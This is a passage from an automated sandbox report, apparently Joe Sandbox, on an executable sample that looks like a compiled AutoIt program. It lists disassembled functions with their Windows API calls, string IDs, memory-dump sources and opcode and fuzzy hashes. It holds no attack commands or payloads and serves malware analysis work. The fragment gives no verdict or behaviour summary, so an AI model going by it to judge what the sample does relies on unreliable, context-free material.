                                                                                                                                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                • API String ID: 4163708885-3819984048
                                                                                                                                                                                                                • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                                                                                                • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                                                                                                                                Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                                                                                                                • API String ID: 0-1896584978
                                                                                                                                                                                                                • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                                                                                                                                • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                                                                                                                                                Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __wcsicoll$IconLoad
                                                                                                                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                • API String ID: 2485277191-404129466
                                                                                                                                                                                                                • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                                                                                                • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                                                                                                                                Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                                                                                                                                • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3869813825-0
                                                                                                                                                                                                                • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                                                                                                • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                                                                                                                                Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00464B28
                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00464C28
                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00464CBA
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00464CD0
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00464CEF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcslen$Directory$CurrentSystem
                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                • API String ID: 1914653954-2746444292
                                                                                                                                                                                                                • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                                                                                                                                                • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                                                                                                                                Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 0045CE39
                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0045CE78
                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0045CE8B
                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0045CE9E
                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                                                                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0045CF61
                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                • API String ID: 1153243558-438819550
                                                                                                                                                                                                                • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                                                                                                • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                                                                                                                                                Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __wcsicoll
                                                                                                                                                                                                                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                                                                                                                • API String ID: 3832890014-4202584635
                                                                                                                                                                                                                • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                                                                                                • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                                                                                                                                Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                                                                                                                                • GetFocus.USER32 ref: 0046A0DD
                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessagePost$CtrlFocus
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 1534620443-4108050209
                                                                                                                                                                                                                • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                                                                                                                                • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                                                                                                                Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$CreateDestroy
                                                                                                                                                                                                                • String ID: ,$tooltips_class32
                                                                                                                                                                                                                • API String ID: 1109047481-3856767331
                                                                                                                                                                                                                • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                                                                                • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                                                                                                                                Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                                                                                                                • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                                                                                                                • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 1441871840-4108050209
                                                                                                                                                                                                                • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                                                                                                                                • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                                                                                                                                Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                                                                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                                                                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00460915
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0046092D
                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 004609E1
                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                • API String ID: 3631882475-2268648507
                                                                                                                                                                                                                • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                                                                                                • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
